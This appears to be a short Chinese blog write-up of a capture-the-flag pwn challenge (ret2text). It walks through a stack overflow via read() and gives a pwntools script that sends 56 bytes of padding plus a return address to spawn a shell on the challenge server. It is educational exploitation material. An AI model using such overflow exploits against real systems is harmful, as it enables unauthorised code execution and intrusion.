Ctfplus | stack overflow

134 字

1 分钟

Ctfplus | stack overflow

2026-03-01

CTF

Pwn

/

ret2text

gdb分析附件，查看main：可以看到此处通过read读取输入到栈缓冲区
查看该程序所有函数：可以看到/bin/sh就在whhhat函数中并且通过execve来调用

所以可以通过read进行数据写入造成栈溢出，来调用whhhat函数
whhhat函数地址：
通过对main函数分析或者cyclic都可以得出溢出范围：

EXP：

1
from pwn import *
2

3
a = remote("nc1.ctfplus.cn", 47523)
4
# a = process("./hello")
5

6
payload = b"A" * 56 + p64(0x4011F7)
7

8
a.sendline(payload)
9
a.interactive()

alt text

Ctfplus | stack overflow

https://lepustimus.github.io/posts/pwn/ctfplus-stack-overflow/

作者

Lepustimidus

发布于

2026-03-01

许可协议

CC BY-NC-SA 4.0

Ctfplus | ret2libc

BJDCTF 2020 babystack